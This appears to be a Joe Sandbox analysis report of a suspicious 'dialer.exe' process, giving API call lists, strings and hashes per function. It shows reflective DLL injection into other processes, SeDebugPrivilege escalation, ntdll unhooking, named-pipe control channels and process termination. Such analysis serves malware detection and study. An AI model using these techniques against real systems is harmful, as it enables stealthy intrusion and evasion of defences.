
Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction ID: e66ab5fa3e644c395c7e155f16e0a52e394f691d87573ec4fabe612ead34abe9
Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction Fuzzy Hash: 58E06D35601604A6EB048FA2E90838A36F1FBCAF46F08C125C90907371DF7DC499CB50

Analysis Process: dialer.exePID: 6064, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	49.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	226
Total number of Limit Nodes:	23

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF64295226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF642951F2C: StrCpyW.SHLWAPI ref: 00007FF642951F5D
Part of subcall function 00007FF642951F2C: StrCatW.SHLWAPI ref: 00007FF642951F6B
Part of subcall function 00007FF642951F2C: GetModuleHandleW.KERNEL32 ref: 00007FF642951F74
Part of subcall function 00007FF642951F2C: GetCurrentProcess.KERNEL32 ref: 00007FF642951F94
Part of subcall function 00007FF642951F2C: K32GetModuleInformation.KERNEL32 ref: 00007FF642951FA8
Part of subcall function 00007FF642951F2C: CreateFileW.KERNELBASE ref: 00007FF642951FD8
Part of subcall function 00007FF642951F2C: CreateFileMappingW.KERNELBASE ref: 00007FF642952002
Part of subcall function 00007FF642951F2C: MapViewOfFile.KERNELBASE ref: 00007FF642952025
Part of subcall function 00007FF642951F2C: lstrcmpiA.KERNEL32 ref: 00007FF64295207B
Part of subcall function 00007FF642951F2C: CloseHandle.KERNELBASE ref: 00007FF6429520E7
Part of subcall function 00007FF642951F2C: CloseHandle.KERNEL32 ref: 00007FF6429520F0
Part of subcall function 00007FF642951F2C: FreeLibrary.KERNEL32 ref: 00007FF6429520F9

Part of subcall function 00007FF642951F2C: VirtualProtect.KERNELBASE ref: 00007FF6429520AE
Part of subcall function 00007FF642951F2C: VirtualProtect.KERNELBASE ref: 00007FF6429520DE

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295228F
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295229F
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF6429522B9
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6429522D0
AdjustTokenPrivileges.KERNELBASE ref: 00007FF642952308
GetLastError.KERNEL32 ref: 00007FF642952312
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295231B
FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295232F
SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF642952346
LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295235F
LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF642952371
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295237E
RegCreateKeyExW.KERNELBASE ref: 00007FF6429523BE
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF6429523E5
RegSetKeySecurity.KERNELBASE ref: 00007FF6429523FE
LocalFree.KERNEL32 ref: 00007FF642952408
RegCreateKeyExW.KERNELBASE ref: 00007FF64295243E
GetCurrentProcessId.KERNEL32 ref: 00007FF642952448
RegSetValueExW.KERNELBASE ref: 00007FF64295246F
RegCloseKey.KERNELBASE ref: 00007FF642952479
RegCloseKey.ADVAPI32 ref: 00007FF642952483
CreateThread.KERNELBASE ref: 00007FF6429524A4
GetProcessHeap.KERNEL32 ref: 00007FF6429524AA
HeapAlloc.KERNEL32 ref: 00007FF6429524B9
CreateThread.KERNELBASE ref: 00007FF6429524E8
CreateThread.KERNELBASE ref: 00007FF642952509
SleepEx.KERNELBASE ref: 00007FF642952511

Strings

ntdll.dll, xrefs: 00007FF642952277
pid, xrefs: 00007FF64295241B
DLL, xrefs: 00007FF642952321
SOFTWARE\dialerconfig, xrefs: 00007FF642952399
svc64, xrefs: 00007FF642952452
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 00007FF6429523DE
SeDebugPrivilege, xrefs: 00007FF6429522C9
kernel32.dll, xrefs: 00007FF642952283

Memory Dump Source

Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true

Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd

Similarity

API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
API String ID: 4177739653-1130149537
Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
Instruction ID: b0b2ef005cc9cebdf82d94ef1335c7855a5ff058f79ce7e09bc5b897fb94b059
Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
Instruction Fuzzy Hash: A0811B32B0CB4296E724BF32E8541A9B3A0FF8875EBA44135D94DC2A65DF7ED184C704

Function 00007FF6429510C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6429518AC: OpenProcess.KERNEL32(?,?,?,00007FF64295110E), ref: 00007FF6429518CA
Part of subcall function 00007FF6429518AC: IsWow64Process.KERNEL32(?,?,?,00007FF64295110E), ref: 00007FF6429518E0
Part of subcall function 00007FF6429518AC: CloseHandle.KERNELBASE(?,?,?,00007FF64295110E), ref: 00007FF6429518FB

OpenProcess.KERNEL32 ref: 00007FF64295112C
OpenProcess.KERNEL32 ref: 00007FF64295114B
K32GetModuleFileNameExW.KERNEL32 ref: 00007FF642951170
PathFindFileNameW.SHLWAPI ref: 00007FF64295117E
lstrlenW.KERNEL32 ref: 00007FF64295118A
StrCpyW.SHLWAPI ref: 00007FF6429511A1
CloseHandle.KERNEL32 ref: 00007FF6429511AD
StrCmpIW.SHLWAPI ref: 00007FF6429511E2
NtQueryInformationProcess.NTDLL ref: 00007FF642951216
OpenProcessToken.ADVAPI32 ref: 00007FF642951240
GetTokenInformation.KERNELBASE ref: 00007FF64295126C
GetLastError.KERNEL32 ref: 00007FF642951276
LocalAlloc.KERNEL32 ref: 00007FF642951289
GetTokenInformation.KERNELBASE ref: 00007FF6429512B5
GetSidSubAuthorityCount.ADVAPI32 ref: 00007FF6429512C2
GetSidSubAuthority.ADVAPI32 ref: 00007FF6429512D1
LocalFree.KERNEL32 ref: 00007FF6429512E9
CloseHandle.KERNEL32 ref: 00007FF6429512FD
StrStrA.SHLWAPI ref: 00007FF6429513A7
VirtualAllocEx.KERNELBASE ref: 00007FF64295140E
WriteProcessMemory.KERNELBASE ref: 00007FF642951431
WaitForSingleObject.KERNEL32 ref: 00007FF64295147D
GetExitCodeThread.KERNEL32 ref: 00007FF642951493
CloseHandle.KERNELBASE ref: 00007FF6429514AB
CloseHandle.KERNEL32 ref: 00007FF6429514B4

Strings

@, xrefs: 00007FF642951401
ReflectiveDllMain, xrefs: 00007FF64295139D
dialer.exe, xrefs: 00007FF6429511CC
MSBuild.exe, xrefs: 00007FF6429511B8

Memory Dump Source

Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true

Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd

Similarity

API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
API String ID: 2561231171-3753927220
Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
Instruction ID: e6d825a8506f8645c3b29059d977ce466bfb8ea1e2aec5093385c139a01b2bc7
Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
Instruction Fuzzy Hash: 93B14D22B0C68286EB24BF23A84027967A5FF44B8EF604135DA0DC7756DFBEE585C740

Function 00007FF6429514D8 Relevance: 19.6, APIs: 13, Instructions: 130
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF64295150B
HeapAlloc.KERNEL32 ref: 00007FF64295151E
GetProcessHeap.KERNEL32 ref: 00007FF64295152C
HeapAlloc.KERNEL32 ref: 00007FF64295153D
K32EnumProcesses.KERNEL32 ref: 00007FF642951557
OpenProcess.KERNEL32 ref: 00007FF642951585
K32EnumProcessModules.KERNEL32 ref: 00007FF6429515AA
ReadProcessMemory.KERNELBASE ref: 00007FF6429515E1
CloseHandle.KERNELBASE ref: 00007FF64295161D
GetProcessHeap.KERNEL32 ref: 00007FF64295162F
HeapFree.KERNEL32 ref: 00007FF64295163D
GetProcessHeap.KERNEL32 ref: 00007FF642951643
HeapFree.KERNEL32 ref: 00007FF642951651

Memory Dump Source

Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true

Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
String ID:
API String ID: 4084875642-0
Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
Instruction ID: 7927f1c0386f631b24a274f182f4c2640419eaf4c6751e11eb4c812b24c033e3
Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
Instruction Fuzzy Hash: 6E51BD33B096828AEB25BF23A8546A963A0FB49B8EF544034DA49C7755DF7DE485C600

Function 00007FF642951F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 00007FF642951F5D
StrCatW.SHLWAPI ref: 00007FF642951F6B
GetModuleHandleW.KERNEL32 ref: 00007FF642951F74
GetCurrentProcess.KERNEL32 ref: 00007FF642951F94
K32GetModuleInformation.KERNEL32 ref: 00007FF642951FA8
CreateFileW.KERNELBASE ref: 00007FF642951FD8
CreateFileMappingW.KERNELBASE ref: 00007FF642952002
MapViewOfFile.KERNELBASE ref: 00007FF642952025
lstrcmpiA.KERNEL32 ref: 00007FF64295207B
VirtualProtect.KERNELBASE ref: 00007FF6429520AE
VirtualProtect.KERNELBASE ref: 00007FF6429520DE
CloseHandle.KERNELBASE ref: 00007FF6429520E7
CloseHandle.KERNEL32 ref: 00007FF6429520F0
FreeLibrary.KERNEL32 ref: 00007FF6429520F9

Strings

.text, xrefs: 00007FF642952074
C:\Windows\System32\, xrefs: 00007FF642951F4F

Memory Dump Source

Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true

Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd

Similarity

API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 2721474350-832442975
Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
Instruction ID: e97b2306410af28f8f3ffcb6e793257af9b99190e07d510a79aa4c3f0f7ac14f
Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
Instruction Fuzzy Hash: 4A51C122B0D68182EB14AF22E45426AB361FF84B9AF544131DE4E83B59DF7EE488C700

Function 00007FF642952BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF642951B54: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF642951BA3
Part of subcall function 00007FF642951B54: SetEntriesInAclW.ADVAPI32 ref: 00007FF642951BEB
Part of subcall function 00007FF642951B54: LocalAlloc.KERNEL32 ref: 00007FF642951BFB
Part of subcall function 00007FF642951B54: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF642951C0F
Part of subcall function 00007FF642951B54: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF642951C26
Part of subcall function 00007FF642951B54: CreateNamedPipeW.KERNELBASE ref: 00007FF642951C67

Sleep.KERNEL32 ref: 00007FF642952C1D
ConnectNamedPipe.KERNELBASE ref: 00007FF642952C2A
ReadFile.KERNELBASE ref: 00007FF642952C4D
WriteFile.KERNEL32 ref: 00007FF642952C7B
Sleep.KERNEL32 ref: 00007FF642952C88
DisconnectNamedPipe.KERNELBASE ref: 00007FF642952C91

Strings

\\.\pipe\dialerchildproc64, xrefs: 00007FF642952C05
M, xrefs: 00007FF642952C6E

Memory Dump Source

Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true

Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\dialerchildproc64
API String ID: 2203880229-3489460547
Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
Instruction ID: ead008b3cd00237fe7ca8265c32e8e15cee4b2c7c6f6efa7763a3be908f2a472
Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
Instruction Fuzzy Hash: 8C117323B0C64692E718FB22E804379A760AF857AAF644235D55EC26D6DFBDE488C704

Function 00007FF6429521D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF642951B54: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF642951BA3
Part of subcall function 00007FF642951B54: SetEntriesInAclW.ADVAPI32 ref: 00007FF642951BEB
Part of subcall function 00007FF642951B54: LocalAlloc.KERNEL32 ref: 00007FF642951BFB
Part of subcall function 00007FF642951B54: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF642951C0F
Part of subcall function 00007FF642951B54: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF642951C26
Part of subcall function 00007FF642951B54: CreateNamedPipeW.KERNELBASE ref: 00007FF642951C67

Sleep.KERNEL32 ref: 00007FF6429521F5
ConnectNamedPipe.KERNELBASE ref: 00007FF642952202
ReadFile.KERNEL32 ref: 00007FF642952225
Sleep.KERNEL32 ref: 00007FF642952246
DisconnectNamedPipe.KERNEL32 ref: 00007FF64295224F

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF6429521DD

Memory Dump Source

Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true

Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 2071455217-3440882674
Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
Instruction ID: 1131d8b01f42ac3cde193b3eebc822b599b59e9cafa000d3e7c551c751869c5e
Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
Instruction Fuzzy Hash: C8014433F0C64292E618BB23A404275A360AF417EAF644234DA2EC25E6DFBEE484C704

Function 00007FF642951B54 Relevance: 9.1, APIs: 6, Instructions: 82
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 00007FF642951BA3
SetEntriesInAclW.ADVAPI32 ref: 00007FF642951BEB
LocalAlloc.KERNEL32 ref: 00007FF642951BFB
InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF642951C0F
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF642951C26
CreateNamedPipeW.KERNELBASE ref: 00007FF642951C67

Memory Dump Source

Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true

Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
Instruction ID: 40fa87f86c4e3c725976a0eca27fb26d5a4fe47c703b3521620a75e08bd097f3
Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
Instruction Fuzzy Hash: 7F318D33A187528AD720EF25E48079E77A5FB4879CF50022AEB4D83A98DF7DD148CB44

Function 00007FF642952B38 Relevance: 9.1, APIs: 6, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF642952B53
HeapAlloc.KERNEL32 ref: 00007FF642952B67
GetProcessHeap.KERNEL32 ref: 00007FF642952B70
HeapAlloc.KERNEL32 ref: 00007FF642952B7E
K32EnumProcesses.KERNEL32 ref: 00007FF642952B99
SleepEx.KERNELBASE ref: 00007FF642952BEE

Memory Dump Source

Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true

Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
Instruction ID: e8c851af053773b4345d5d4def8709d170a1e098659e94d0762549485f88ead0
Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
Instruction Fuzzy Hash: F8114233B0CA5246E718FF27A85452A7761FB85B86F644038DA4A87759CE7EE4818A40

Function 00007FF6429517EC Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,00000000,?,00007FF64295238B,?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF642951801
HeapAlloc.KERNEL32(?,00000000,?,00007FF64295238B,?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF642951812

Part of subcall function 00007FF6429514D8: GetProcessHeap.KERNEL32 ref: 00007FF64295150B
Part of subcall function 00007FF6429514D8: HeapAlloc.KERNEL32 ref: 00007FF64295151E
Part of subcall function 00007FF6429514D8: GetProcessHeap.KERNEL32 ref: 00007FF64295152C
Part of subcall function 00007FF6429514D8: HeapAlloc.KERNEL32 ref: 00007FF64295153D
Part of subcall function 00007FF6429514D8: K32EnumProcesses.KERNEL32 ref: 00007FF642951557
Part of subcall function 00007FF6429514D8: OpenProcess.KERNEL32 ref: 00007FF642951585
Part of subcall function 00007FF6429514D8: K32EnumProcessModules.KERNEL32 ref: 00007FF6429515AA
Part of subcall function 00007FF6429514D8: ReadProcessMemory.KERNELBASE ref: 00007FF6429515E1
Part of subcall function 00007FF6429514D8: CloseHandle.KERNELBASE ref: 00007FF64295161D
Part of subcall function 00007FF6429514D8: GetProcessHeap.KERNEL32 ref: 00007FF64295162F
Part of subcall function 00007FF6429514D8: HeapFree.KERNEL32 ref: 00007FF64295163D
Part of subcall function 00007FF6429514D8: GetProcessHeap.KERNEL32 ref: 00007FF642951643
Part of subcall function 00007FF6429514D8: HeapFree.KERNEL32 ref: 00007FF642951651

OpenProcess.KERNEL32 ref: 00007FF642951859
TerminateProcess.KERNELBASE ref: 00007FF64295186C
CloseHandle.KERNEL32 ref: 00007FF642951875
GetProcessHeap.KERNEL32 ref: 00007FF642951885

Memory Dump Source

Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true

Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd

Similarity

API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
String ID:
API String ID: 1323846700-0
Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
Instruction ID: e88442ca17796abffd66c535d00acc49da7a4be97c62e9142cf75eb72360fc80
Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
Instruction Fuzzy Hash: F2117522F0D64296EB15FF27A854069A7A1AF89B8EF284034DE0DC3756DE7EE4C58704

Function 00007FF642951914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNELBASE(?,?,00000000,00007FF642952138), ref: 00007FF642951924
GetProcAddress.KERNEL32(?,?,00000000,00007FF642952138), ref: 00007FF642951937

Strings

ntdll.dll, xrefs: 00007FF64295191A

Memory Dump Source

Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true

Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll.dll
API String ID: 1646373207-2227199552
Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
Instruction ID: a29b4b4815024b617159393710f8ff3a59fdd4569b61e53a9bba2427975aa9ca
Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
Instruction Fuzzy Hash: 70D0C756B1D50792EE197773686403493915F5874EFD44030CD1EC6352DE6DD0D58604

Function 00007FF6429518AC Relevance: 4.5, APIs: 3, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(?,?,?,00007FF64295110E), ref: 00007FF6429518CA
IsWow64Process.KERNEL32(?,?,?,00007FF64295110E), ref: 00007FF6429518E0
CloseHandle.KERNELBASE(?,?,?,00007FF64295110E), ref: 00007FF6429518FB

Memory Dump Source

Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true

Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd

Similarity

API ID: Process$CloseHandleOpenWow64
String ID:
API String ID: 10462204-0
Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
Instruction ID: 20d63f1508588696d71c566d7830035c378d1612da68280f37d78186c814ad2d
Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
Instruction Fuzzy Hash: 47F06D22B0C78282EB14AF27B480129A360EB88BC5F549038EA8DC3759DF7ED4C48704

Function 00007FF642952258 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF64295226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295228F
Part of subcall function 00007FF64295226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295229F
Part of subcall function 00007FF64295226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF6429522B9
Part of subcall function 00007FF64295226C: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6429522D0
Part of subcall function 00007FF64295226C: AdjustTokenPrivileges.KERNELBASE ref: 00007FF642952308
Part of subcall function 00007FF64295226C: GetLastError.KERNEL32 ref: 00007FF642952312
Part of subcall function 00007FF64295226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295231B
Part of subcall function 00007FF64295226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295232F
Part of subcall function 00007FF64295226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF642952346
Part of subcall function 00007FF64295226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295235F
Part of subcall function 00007FF64295226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF642952371
